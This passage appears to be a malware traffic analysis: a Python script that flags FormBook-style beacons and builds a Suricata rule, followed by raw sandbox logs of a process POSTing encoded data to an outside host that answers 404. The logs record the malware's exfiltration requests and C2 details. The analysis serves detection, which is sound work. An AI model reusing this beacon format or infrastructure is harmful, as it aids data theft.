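    params = parse_qs(parts.query if method == "GET" else body, keep_blank_values=True)
    return {"method": method, "host": headers.get("host"), "path": parts.path,
            "headers": headers, "params": params, "body_len": len(body)}


def is_beacon(req):
    """Heuristic derived from sessions 0-4: known UA, short path, one or two short keys."""
    h, keys = req["headers"], list(req["params"])
    if h.get("user-agent") != UA or h.get("connection") != "close":
        return False
    if not BEACON_PATH.match(req["path"]) or not all(len(k) <= 5 for k in keys):
        return False
    if req["method"] == "GET":
        return len(keys) == 2
    return (req["method"] == "POST"
            and h.get("content-type") == "application/x-www-form-urlencoded"
            and len(keys) == 1
            and req["body_len"] == int(h.get("content-length", -1)))


def summarize(sessions=SESSIONS):
    """Per-host path map plus the facts that make this traffic stand out."""
    reqs = [parse_request(raw) for raw, _ in sessions]
    hosts = {}
    for r in reqs:
        hosts.setdefault(r["host"], r["path"])
    return {
        "hosts": hosts,
        "user_agents": sorted({r["headers"].get("user-agent") for r in reqs}),
        "beacons": sum(is_beacon(r) for r in reqs),
        "all_404": all(status == 404 for _, status in sessions),
        "largest_post": max((r["body_len"] for r in reqs if r["method"] == "POST"), default=0),
    }


def suricata_rule(ua=UA, sid=1000001):
    """Illustrative Suricata rule keyed on the observed User-Agent (sid is a placeholder)."""
    escaped = ua.replace("\\", "\\\\").replace('"', '\\"').replace(";", "\\;")
    return ('alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"FormBook-style beacon UA"; '
            f'flow:established,to_server; http.user_agent; content:"{escaped}"; '
            f'classtype:trojan-activity; sid:{sid}; rev:1;)')


if __name__ == "__main__":
    print(summarize())
    print(suricata_rule())
```

The summary shows one User-Agent across two hosts, all five requests matching the beacon heuristic, every reply a 404, and a single POST of 10,301 bytes, which is the one worth pulling out of the pcap for decryption: a client that keeps POSTing kilobytes of form data to hosts that answer 404 is exfiltrating, not browsing.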
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.4 | 49742 | 37.187.158.211 | 80 | 5440 | C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exe
Timestamp | Bytes transferred | Direction | Data
Sep 4, 2024 09:36:15.596967936 CEST | 769 | OUT | POST /t3gh/ HTTP/1.1
                  Host: www.fontanerourgente.net
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                  Accept-Language: en-US,en;q=0.5
                  Accept-Encoding: gzip, deflate
                  Origin: http://www.fontanerourgente.net
                  Referer: http://www.fontanerourgente.net/t3gh/
                  Cache-Control: max-age=0
                  Connection: close
                  Content-Length: 201
                  Content-Type: application/x-www-form-urlencoded
                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                  Data Raw: 35 36 67 44 3d 51 39 77 6e 59 55 52 7a 78 77 6a 6e 6d 69 66 6c 69 44 55 77 78 65 54 72 47 70 69 62 78 67 63 58 61 38 6e 65 53 49 35 57 6d 44 6c 54 4d 30 77 50 55 78 67 4a 66 4c 72 69 35 43 74 77 4b 69 30 37 73 4b 7a 4d 6c 39 7a 31 43 55 61 32 62 4a 4a 4b 57 2b 31 6e 70 53 56 33 2b 79 44 6b 34 49 6e 66 74 6d 5a 2f 70 62 78 66 79 4a 72 72 6f 71 62 46 5a 70 65 62 59 36 34 4c 69 4b 71 57 44 54 50 56 4a 73 58 64 52 4e 33 66 42 66 70 79 6c 35 66 42 35 54 36 47 47 39 6b 6b 31 39 6f 74 74 57 4f 6c 75 6e 79 6f 39 7a 44 33 6c 38 46 62 43 4e 67 71 70 6a 5a 6c 42 35 65 39 46 34 51 31 30 7a 52 52 31 77 3d 3d
                  Data Ascii: 56gD=Q9wnYURzxwjnmifliDUwxeTrGpibxgcXa8neSI5WmDlTM0wPUxgJfLri5CtwKi07sKzMl9z1CUa2bJJKW+1npSV3+yDk4InftmZ/pbxfyJrroqbFZpebY64LiKqWDTPVJsXdRN3fBfpyl5fB5T6GG9kk19ottWOlunyo9zD3l8FbCNgqpjZlB5e9F4Q10zRR1w==
Sep 4, 2024 09:36:16.473136902 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                  Date: Wed, 04 Sep 2024 07:36:16 GMT
                  Server: Apache
                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                  Cache-Control: no-cache, must-revalidate, max-age=0
                  Link: <https://mgmasistencia.com/wp-json/>; rel="https://api.w.org/"
                  Connection: close
                  Transfer-Encoding: chunked
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 31 63 65 32 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 22 20 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 3c 74 69 74 6c 65 3e 50 c3 a1 67 69 6e 61 20 6e 6f 20 65 6e 63 6f 6e 74 72 61 64 61 20 26 23 38 32 31 31 3b 20 4d 47 4d 20 41 73 69 73 74 65 6e 63 69 61 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 6d 67 6d 61 73 69 73 74 65 6e 63 69 61 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 [TRUNCATED]
Data Ascii: 1ce2<!doctype html><html lang="es" ><head><meta charset="UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Página no encontrada &#8211; MGM Asistencia</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//mgmasistencia.com' /><link rel="alternate" type="application/rss+xml" title="MGM Asistencia &raquo; Feed" href="https://mgmasistencia.com/feed/" /><link rel="alternate" type="application/rss+xml" title="MGM Asistencia &raquo; Feed de los comentarios" href="https://mgmasistencia.com/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/mgmasistencia.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.6.1"}};/
                  Sep 4, 2024 09:36:16.473155022 CEST | 1236 | IN | Data Raw: 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74
                  Data Ascii: *! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas
                  Sep 4, 2024 09:36:16.473165989 CEST | 1236 | IN | Data Raw: 29 2c 6f 3d 28 61 2e 74 65 78 74 42 61 73 65 6c 69 6e 65 3d 22 74 6f 70 22 2c 61 2e 66 6f 6e 74 3d 22 36 30 30 20 33 32 70 78 20 41 72 69 61 6c 22 2c 7b 7d 29 3b 72 65 74 75 72 6e 20 65 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 65 29
                  Data Ascii: ),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupport
                  Sep 4, 2024 09:36:16.473310947 CEST | 672 | IN | Data Raw: 28 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 29 3b 6e
                  Data Ascii: (n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.supports.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return
                  Sep 4, 2024 09:36:16.473321915 CEST | 1236 | IN | Data Raw: 74 3b 0a 09 09 6d 61 72 67 69 6e 3a 20 30 20 30 2e 30 37 65 6d 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 09 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 2d 30 2e 31 65 6d 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 09 62 61 63 6b 67 72 6f 75 6e
                  Data Ascii: t;margin: 0 0.07em !important;vertical-align: -0.1em !important;background: none !important;padding: 0 !important;}</style><link rel='stylesheet' id='wp-block-library-css' href='http://mgmasistencia.com/wp-includes/css/dist/blo
                  Sep 4, 2024 09:36:16.473332882 CEST | 1236 | IN | Data Raw: 75 6c 6c 71 75 6f 74 65 20 63 69 74 65 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 70 75 6c 6c 71 75 6f 74 65 20 66 6f 6f 74 65 72 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 70 75 6c 6c 71 75 6f 74 65 5f 5f 63 69 74 61 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 63 75 72 72 65
                  Data Ascii: ullquote cite,.wp-block-pullquote footer,.wp-block-pullquote__citation{color:currentColor;font-size:.8125em;font-style:normal;text-transform:uppercase}.wp-block-quote{border-left:.25em solid;margin:0 0 1.75em;padding-left:1em}.wp-block-quote c
                  Sep 4, 2024 09:36:16.473345041 CEST | 1236 | IN | Data Raw: 67 68 74 3a 32 70 78 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 74 61 62 6c 65 7b 6d 61 72 67 69 6e 3a 30 20 30 20 31 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 74 61 62 6c 65 20 74 64 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 74 61 62 6c 65 20 74 68 7b 77 6f 72 64 2d
                  Data Ascii: ght:2px}.wp-block-table{margin:0 0 1em}.wp-block-table td,.wp-block-table th{word-break:normal}.wp-block-table :where(figcaption){color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-table :where(figcaption){color:#ffffffa6}.wp
                  Sep 4, 2024 09:36:16.473356962 CEST | 1236 | IN | Data Raw: 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 63 79 61 6e 2d 62 6c 75 69 73 68 2d 67 72 61 79 3a 20 23 61 62 62 38 63 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 3a 20 23 46 46 46 46 46 46 3b 2d 2d 77 70 2d 2d
                  Data Ascii: reset--color--cyan-bluish-gray: #abb8c3;--wp--preset--color--white: #FFFFFF;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid
                  Sep 4, 2024 09:36:16.473372936 CEST | 1236 | IN | Data Raw: 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 61 28 32 35 35 2c 31 30 35 2c 30 2c 31 29 20 30 25 2c 72 67 62 28 32 30 37 2c 34 36 2c 34 36 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 76 65 72
                  Data Ascii: dient(135deg,rgba(255,105,0,1) 0%,rgb(207,46,46) 100%);--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray: linear-gradient(135deg,rgb(238,238,238) 0%,rgb(169,184,195) 100%);--wp--preset--gradient--cool-to-warm-spectrum: linear-gradien
                  Sep 4, 2024 09:36:16.473388910 CEST | 1236 | IN | Data Raw: 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 67 72 65 65 6e 2d 74 6f 2d 79 65 6c 6c 6f 77 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 36 30 64 65 67 2c 20 23 44 31 45 34 44 44 20 30 25 2c 20 23 45 45 45 41
                  Data Ascii: --wp--preset--gradient--green-to-yellow: linear-gradient(160deg, #D1E4DD 0%, #EEEADD 100%);--wp--preset--gradient--yellow-to-green: linear-gradient(160deg, #EEEADD 0%, #D1E4DD 100%);--wp--preset--gradient--red-to-yellow: linear-gradient(160deg
                  Sep 4, 2024 09:36:16.478178024 CEST | 1236 | IN | Data Raw: 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 30 2e 34 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 68 61 64 6f 77 2d 2d 73 68 61 72 70 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 30 2e 32 29 3b 2d 2d 77
                  Data Ascii: rgba(0, 0, 0, 0.4);--wp--preset--shadow--sharp: 6px 6px 0px rgba(0, 0, 0, 0.2);--wp--preset--shadow--outlined: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  6 | 192.168.2.4 | 49743 | 37.187.158.211 | 80 | 5440 | C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 4, 2024 09:36:18.200577974 CEST | 789 | OUT | POST /t3gh/ HTTP/1.1
                  Host: www.fontanerourgente.net
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                  Accept-Language: en-US,en;q=0.5
                  Accept-Encoding: gzip, deflate
                  Origin: http://www.fontanerourgente.net
                  Referer: http://www.fontanerourgente.net/t3gh/
                  Cache-Control: max-age=0
                  Connection: close
                  Content-Length: 221
                  Content-Type: application/x-www-form-urlencoded
                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                  Data Raw: 35 36 67 44 3d 51 39 77 6e 59 55 52 7a 78 77 6a 6e 6e 47 6a 6c 6b 67 38 77 30 2b 54 6f 4c 35 69 62 6f 51 63 54 61 38 6a 65 53 4a 39 67 6d 78 42 54 4d 52 55 50 62 54 45 4a 65 4c 72 69 33 69 74 78 58 79 30 73 73 4b 2f 75 6c 2f 33 31 43 55 65 32 62 4c 52 4b 52 4a 70 6f 72 43 56 31 79 53 44 71 37 34 6e 66 74 6d 5a 2f 70 62 6c 78 79 4a 6a 72 76 61 72 46 59 4c 32 63 57 61 34 49 6c 4b 71 57 48 54 50 52 4a 73 58 30 52 4a 58 35 42 5a 6c 79 6c 35 50 42 35 6e 4f 46 4e 39 6b 59 37 64 70 63 6b 47 7a 64 72 30 66 6c 38 6c 4c 73 76 38 42 64 4f 72 78 77 34 53 34 79 54 35 36 4f 59 2f 5a 42 35 77 73 59 75 2b 4a 41 65 45 55 78 36 4b 7a 6a 79 73 71 58 71 70 66 52 47 74 51 3d
                  Data Ascii: 56gD=Q9wnYURzxwjnnGjlkg8w0+ToL5iboQcTa8jeSJ9gmxBTMRUPbTEJeLri3itxXy0ssK/ul/31CUe2bLRKRJporCV1ySDq74nftmZ/pblxyJjrvarFYL2cWa4IlKqWHTPRJsX0RJX5BZlyl5PB5nOFN9kY7dpckGzdr0fl8lLsv8BdOrxw4S4yT56OY/ZB5wsYu+JAeEUx6KzjysqXqpfRGtQ=
                  Sep 4, 2024 09:36:19.092109919 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                  Date: Wed, 04 Sep 2024 07:36:18 GMT
                  Server: Apache
                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                  Cache-Control: no-cache, must-revalidate, max-age=0
                  Link: <https://mgmasistencia.com/wp-json/>; rel="https://api.w.org/"
                  Connection: close
                  Transfer-Encoding: chunked
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 31 63 65 32 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 22 20 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 3c 74 69 74 6c 65 3e 50 c3 a1 67 69 6e 61 20 6e 6f 20 65 6e 63 6f 6e 74 72 61 64 61 20 26 23 38 32 31 31 3b 20 4d 47 4d 20 41 73 69 73 74 65 6e 63 69 61 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 6d 67 6d 61 73 69 73 74 65 6e 63 69 61 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 [TRUNCATED]
                  Data Ascii: 1ce2<!doctype html><html lang="es" ><head><meta charset="UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Pgina no encontrada &#8211; MGM Asistencia</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//mgmasistencia.com' /><link rel="alternate" type="application/rss+xml" title="MGM Asistencia &raquo; Feed" href="https://mgmasistencia.com/feed/" /><link rel="alternate" type="application/rss+xml" title="MGM Asistencia &raquo; Feed de los comentarios" href="https://mgmasistencia.com/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/mgmasistencia.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.6.1"}};/
                  Sep 4, 2024 09:36:19.092123032 CEST | 1236 | IN | Data Raw: 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74
                  Data Ascii: *! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas
                  Sep 4, 2024 09:36:19.092133999 CEST | 1236 | IN | Data Raw: 29 2c 6f 3d 28 61 2e 74 65 78 74 42 61 73 65 6c 69 6e 65 3d 22 74 6f 70 22 2c 61 2e 66 6f 6e 74 3d 22 36 30 30 20 33 32 70 78 20 41 72 69 61 6c 22 2c 7b 7d 29 3b 72 65 74 75 72 6e 20 65 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 65 29
                  Data Ascii: ),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupport
                  Sep 4, 2024 09:36:19.092150927 CEST | 1236 | IN | Data Raw: 28 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 29 3b 6e
                  Data Ascii: (n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.supports.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return
                  Sep 4, 2024 09:36:19.092161894 CEST | 896 | IN | Data Raw: 69 75 73 3a 34 70 78 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 4d 65 6e 6c 6f 2c 43 6f 6e 73 6f 6c 61 73 2c 6d 6f 6e 61 63 6f 2c 6d 6f 6e 6f 73 70 61 63 65 3b 70 61 64 64 69 6e 67 3a 2e 38 65 6d 20 31 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 65 6d 62
                  Data Ascii: ius:4px;font-family:Menlo,Consolas,monaco,monospace;padding:.8em 1em}.wp-block-embed :where(figcaption){color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-embed :where(figcaption){color:#ffffffa6}.wp-block-embed{margin:0 0 1e
                  Sep 4, 2024 09:36:19.092171907 CEST | 1236 | IN | Data Raw: 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 71 75 6f 74 65 20 63 69 74 65 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 71 75 6f 74 65 20 66 6f 6f 74 65 72 7b 63 6f 6c 6f 72 3a 63 75 72 72 65 6e 74 43 6f 6c 6f 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 31 32 35 65 6d
                  Data Ascii: m}.wp-block-quote cite,.wp-block-quote footer{color:currentColor;font-size:.8125em;font-style:normal;position:relative}.wp-block-quote.has-text-align-right{border-left:none;border-right:.25em solid;padding-left:0;padding-right:1em}.wp-block-qu
                  Sep 4, 2024 09:36:19.092184067 CEST | 1236 | IN | Data Raw: 63 6f 6c 6f 72 3a 23 66 66 66 66 66 66 61 36 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 76 69 64 65 6f 20 3a 77 68 65 72 65 28 66 69 67 63 61 70 74 69 6f 6e 29 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d
                  Data Ascii: color:#ffffffa6}.wp-block-video :where(figcaption){color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-video :where(figcaption){color:#ffffffa6}.wp-block-video{margin:0 0 1em}:root :where(.wp-block-template-part.has-background
                  Sep 4, 2024 09:36:19.092196941 CEST | 1236 | IN | Data Raw: 6c 6f 72 2d 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 61 6d 62 65 72 3a 20 23 66 63 62 39 30 30 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 3a 20 23 37 62 64 63 62 35 3b
                  Data Ascii: lor--luminous-vivid-amber: #fcb900;--wp--preset--color--light-green-cyan: #7bdcb5;--wp--preset--color--vivid-green-cyan: #00d084;--wp--preset--color--pale-cyan-blue: #8ed1fc;--wp--preset--color--vivid-cyan-blue: #0693e3;--wp--preset--color--vi
                  Sep 4, 2024 09:36:19.092209101 CEST | 1236 | IN | Data Raw: 72 75 6d 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 37 34 2c 32 33 34 2c 32 32 30 29 20 30 25 2c 72 67 62 28 31 35 31 2c 31 32 30 2c 32 30 39 29 20 32 30 25 2c 72 67 62 28 32 30 37 2c 34 32 2c 31 38 36
                  Data Ascii: rum: linear-gradient(135deg,rgb(74,234,220) 0%,rgb(151,120,209) 20%,rgb(207,42,186) 40%,rgb(238,44,130) 60%,rgb(251,105,98) 80%,rgb(254,248,76) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(15
                  Sep 4, 2024 09:36:19.092220068 CEST | 1236 | IN | Data Raw: 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 36 30 64 65 67 2c 20 23 45 34 44 31 44 31 20 30 25 2c 20 23 45 45 45 41 44 44 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 79 65 6c 6c 6f 77 2d 74 6f 2d 72
                  Data Ascii: ear-gradient(160deg, #E4D1D1 0%, #EEEADD 100%);--wp--preset--gradient--yellow-to-red: linear-gradient(160deg, #EEEADD 0%, #E4D1D1 100%);--wp--preset--gradient--purple-to-red: linear-gradient(160deg, #D1D1E4 0%, #E4D1D1 100%);--wp--preset--grad
                  Sep 4, 2024 09:36:19.097244024 CEST | 1236 | IN | Data Raw: 2c 20 30 2c 20 30 2c 20 31 29 3b 7d 3a 77 68 65 72 65 28 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 29 7b 67 61 70 3a 20 30 2e 35 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 7b 67 61 70 3a 20 30 2e 35 65 6d
                  Data Ascii: , 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flex{display: flex;}.is-layout-flex{flex-wrap: wrap;align-items: center;}.is-layout-flex > :is(*, div){margin: 0;}body .is-layout-grid{display:


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  7 | 192.168.2.4 | 49744 | 37.187.158.211 | 80 | 5440 | C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 4, 2024 09:36:20.747164011 CEST | 10871 | OUT | POST /t3gh/ HTTP/1.1
                  Host: www.fontanerourgente.net
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                  Accept-Language: en-US,en;q=0.5
                  Accept-Encoding: gzip, deflate
                  Origin: http://www.fontanerourgente.net
                  Referer: http://www.fontanerourgente.net/t3gh/
                  Cache-Control: max-age=0
                  Connection: close
                  Content-Length: 10301
                  Content-Type: application/x-www-form-urlencoded
                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                  Data Raw: 35 36 67 44 3d 51 39 77 6e 59 55 52 7a 78 77 6a 6e 6e 47 6a 6c 6b 67 38 77 30 2b 54 6f 4c 35 69 62 6f 51 63 54 61 38 6a 65 53 4a 39 67 6d 78 4a 54 50 6a 63 50 61 79 45 4a 59 37 72 69 2f 43 74 30 58 79 30 78 73 4b 58 71 6c 2f 36 41 43 57 57 32 61 6f 5a 4b 51 38 64 6f 78 53 56 31 36 79 44 6e 34 49 6e 77 74 6c 68 37 70 62 31 78 79 4a 6a 72 76 59 44 46 59 5a 65 63 55 61 34 4c 69 4b 71 53 44 54 50 70 4a 73 76 46 52 4a 54 50 42 70 46 79 69 59 2f 42 71 69 36 46 52 74 6b 67 38 64 70 45 6b 47 2f 43 72 31 7a 44 38 6c 58 53 76 2b 64 64 66 66 67 35 6e 53 30 6c 52 59 69 42 61 49 31 32 30 41 51 56 6b 4f 6c 43 65 42 45 33 6f 37 2f 61 70 39 48 6f 2f 35 65 54 58 70 70 39 41 4a 61 2b 64 44 56 75 41 53 64 48 38 30 70 75 36 47 7a 4f 38 4c 73 51 6a 4e 73 67 46 77 67 4a 45 43 6d 73 68 30 4b 68 66 67 42 61 65 73 69 52 59 69 37 44 62 76 4d 56 6b 53 49 66 68 61 48 50 58 4c 62 79 46 32 47 32 34 2f 5a 6b 57 41 44 7a 62 4b 31 6f 47 64 72 68 70 53 54 4e 38 4c 67 72 6d 51 74 65 5a 69 6d 50 74 